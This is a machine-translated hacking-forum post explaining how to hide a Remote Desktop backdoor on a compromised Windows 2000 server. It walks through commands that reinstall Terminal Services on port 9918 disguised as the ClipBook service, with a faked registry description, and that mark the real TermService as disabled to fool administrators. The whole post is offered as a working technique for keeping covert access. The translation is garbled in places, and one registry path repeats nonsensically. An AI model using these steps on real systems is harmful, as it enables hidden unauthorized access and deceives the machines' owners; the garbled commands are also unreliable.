Revision of back door experience
Author: dkollf from: http: //bbs.pysky.net do not know if you install their own backdoor time is how to modify the service, I remember someone said, since the service name is a need for art technology thing, a Very garbage rear door will survive because of your service name, and a very good back door will immediately hang up because of your garbage service name. If you don't say nonsense, let me install terminal services as an example to say the benefits of reform service. Here we have to use a few tools, first introduce: 3389.exe doesn't say it, the earth people know that TPORT.exe should also know, but say, this is a serv.exe service management program for the 3389 port. , You can install, delete, modify a registry tool under DTREG.EXE CMD, and regedit almost. Start, suppose we have controlled the machine, 2KServer, the terminal service has not yet opened, let us open 3389.exe 1 # Install the terminal, do not wear TPORT.EXE 9918 # Modify the port net stop clipsrv # ------ ------------- | Delete the secondary service serv.exe remove clipsrv / y # ----------- | Prepare Copy Termsrv.exe Clipsvr.exe for modification services # Copy the file file into and the name of the service to be replaced Serv.exe Install Clipsrv /B :"%windir%/system32/clipsvr.exe "/ N:" Clipbook "/ i: Yes / u: localsystem / S: Auto # Install the service DTREG.EXE -QUIET -SET REG_SZ / HKLM / SYSTEM / CURRENTCONTROLSET / SYSTEM / CURRENTCONTROLSET / SYSTEM / CURRENTCONTROLSET / SERVICES / CLIPBOOK / Description = Support "Scrapbook Viewer" so that you can access the scrapbook from the remote scrapbook. # Modify the registry serv modify TermService / s: Disabled # Modify the status of the original terminal service Now, you will find that the terminal service is already open, the port is 9918, open the service manager, you will find that the terminal service has been disabled, the process There is also a process of Termsrv.exe, which is already very safe. I have been using this in this way, I don't know if others are doing so, everyone can communicate, huh, huh.
